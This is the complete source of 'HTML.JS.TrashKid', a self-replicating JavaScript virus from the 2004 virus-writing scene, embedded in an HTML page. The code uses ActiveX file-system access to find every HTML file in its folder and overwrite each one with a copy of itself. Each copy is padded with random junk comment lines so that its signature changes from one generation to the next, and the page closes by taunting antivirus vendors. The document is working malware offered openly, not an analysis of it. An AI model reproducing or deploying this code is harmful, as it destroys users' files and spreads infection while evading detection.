HTML.JS.TrashKid    [by DiA]
[executable virus in a zip archive]

  

<html>
<head>
<script language="JavaScript">
// -----------------------------------------------------------------------------------------
// HTML.JS.TrashKid
// A polymorphic (a lot of trash) Overwiter
//
// by DiA[rRlf] (c)04 - GermanY
// www.vx-dia.de.vu - DiA_hates_machine@gmx.de
// -----------------------------------------------------------------------------------------
//
//
// This is a simple polymorphic Overwriter, it's polymorphic
// because the Virus change with every new generation the trash.
//
//
// -adding trash like: //5390770121714.428571428565344327
// -random number of trash lines
// -random number of blank lines
//
//
// How does it work?
// The Virus read the current running file without any trash, and stores
// the real code in "TrashKidReal.htm" in the current folder.
// After that the Virus search for Victims, and create another file, with trash!
// The file is in current directory under the name "TrashKidTemp.htm".
// Then the Virus copy the "TrashKidTemp.htm" over the Victim. Then the Virus
// search for more victims, and create a new generation, and so on...
//
//
// Trash Example:
//
// Real Code
// ---------
// function Poly() {
// ReadVirus = Virus.OpenAsTextStream();
// fso.CreateTextFile(Folder + "\\TrashKidReal.htm");
// NewVir = fso.OpenTextFile(Folder + "\\TrashKidReal.htm",2,false,0);
//
//
// With Trash
// ----------
// //8889177655371595361
//
// function Poly() {
//
//
// //70581686275.111111111118612989
//
// //161850413524.59841448
//
// //606466039028.714285714286067327
//
// //578152848915.57347906
// //1836300740285162555
//
// //661121351999790084
// //1131630281071.66666666672218833
//
//
// //1256708200822991092
// //7186577172656854811
// ReadVirus = Virus.OpenAsTextStream();
//
// //42769321329773489406
//
//
// //363942514122.41096815
// //37507442358742910184
//
//
// //17408854284.6666666666679249103
// //37492095206.59058052
//
//
// //2899834838766775281
// fso.CreateTextFile(Folder + "\\TrashKidReal.htm");
//
//
// //358335910665.6923076923086233613
// //5546645392630698512
//
//
// //790289539568.6363636363687127711
//
//
// //21106073250.299241110
//
// //631855811070.2222222222229200839
//
//
// //507909671192.254637458
// //474860425045.7142857142867846397
//
// //5536741434541759076
// //303324026448.23211605
//
//
// //2768772145655.759252364
// //5571751974676704013
// //374540494631670962
// //644993117719404111
//
// NewVir = fso.OpenTextFile(Folder + "\\TrashKidReal.htm",2,false,0);
//
//
//
//
// Greetz:
// rRlf		- hello all!
// philet0ast3r - das nächste mal...
// SPTH		- tolles tutorial über Polymorphism in JavaScript
//
//
// The Intro to HTML.JS.TrashKid will be removed in the next generation, because
// all lines started with "//" will be removed, and generate new Trash in the
// next generation...
//
// this description destroy's itself in 5, 4, 3, 2, 1, 0
//									DiA[rRlf]
//------------------------------------------------------------------------------------------


fso = new ActiveXObject("Scripting.FileSystemObject");
Virus = fso.GetFile(location.href.substr(8));

CurrentFolder = Virus.ParentFolder;
Folder = fso.GetFolder(CurrentFolder);

FindFile = new Enumerator(Folder.Files);
FindFile.moveFirst();

while (FindFile.atEnd() == false) {
	Victim = FindFile.item();
	FileType = fso.GetFile(Victim);

	if (Victim != Virus) {

		if (FileType.Type.indexOf("HTML") != -1) {
			Poly();
			PolyVirus = fso.GetFile(Folder + "\\TrashKidTemp.htm");
			PolyVirus.Copy(Victim);
		}
	}
FindFile.moveNext();
}

fso.DeleteFile(Folder + "\\TrashKidTemp.htm");
fso.DeleteFile(Folder + "\\TrashKidReal.htm");

document.write("<center><h1>HTML.JS.TrashKid - Polymorphic Overwriter</h1><br>");
document.write("by DiA[rRlf] (c)04 - GermanY<br>");
document.write("<a href=\"mailto:DiA_hates_machine@gmx.de\">DiA_hates_machine@gmx.de</a><br>");
document.write("<a href=\"http://www.vx-dia.de.vu\">www.vx-dia.de.vu</a><br><br><br>");
document.write("<b>thx to SPTH for his Polymorphism turoial!<br>But I don't cut 'n paste anything, I did it with my Idea and Code</b><br><br>");
document.write("<br><br><br><i>Hope you AV's have fun with this...</i></center>");

function Poly() {
ReadVirus = Virus.OpenAsTextStream();

fso.CreateTextFile(Folder + "\\TrashKidReal.htm");
NewVir = fso.OpenTextFile(Folder + "\\TrashKidReal.htm",2,false,0);

CodeLine = ReadVirus.ReadLine();

while (CodeLine.substr(0,7) != "</html>") {
	if (CodeLine.substr(0,7) == "</head>") {
		NewVir.WriteLine("</head>");
		NewVir.WriteLine("</html>");
		break;
	}

	if (CodeLine.substr(0,2) != "//") {
		if (CodeLine.substr(0,1) != "") {
			NewVir.WriteLine(CodeLine);
		}
	}

	CodeLine = ReadVirus.ReadLine();
}

NewVir.Close();
ReadVirus.Close();

fso.CreateTextFile(Folder + "\\TrashKidTemp.htm");
Temp = fso.OpenTextFile(Folder + "\\TrashKidTemp.htm",2,false,0);
Temp.WriteLine("<html>");
Temp.WriteLine("<head>");
Temp.WriteLine("<script language=\"JavaScript\">");

RealCode = fso.GetFile(Folder + "\\TrashKidReal.htm");
ReadCode = RealCode.OpenAsTextStream();

ReadCode.ReadLine();
ReadCode.ReadLine();
ReadCode.ReadLine();
CodeLine = ReadCode.ReadLine();

while (CodeLine.substr(0,7) != "</head>") {
	TrashLines = Math.round(Math.random()*13)+1;

	while (TrashLines != 0) {
		if (CodeLine.substr(2,9) == "script>") {
			break;
		}

		Temp.WriteBlankLines(Math.round(Math.random()*2));
		Trash = "//" + Math.round(Math.random()*999999)*TrashLines + Math.round(Math.random()*999999)/TrashLines +  Math.round(Math.random()*999999)+TrashLines;
		Temp.WriteLine(Trash);
		TrashLines = TrashLines-1;
	}

	Temp.WriteBlankLines(Math.round(Math.random()*2));
	Temp.WriteLine(CodeLine);
	CodeLine = ReadCode.ReadLine();
}

Temp.WriteLine("</head>");
Temp.WriteLine("</html>");

ReadCode.Close();
Temp.Close();
}

</script>
</head>
</html>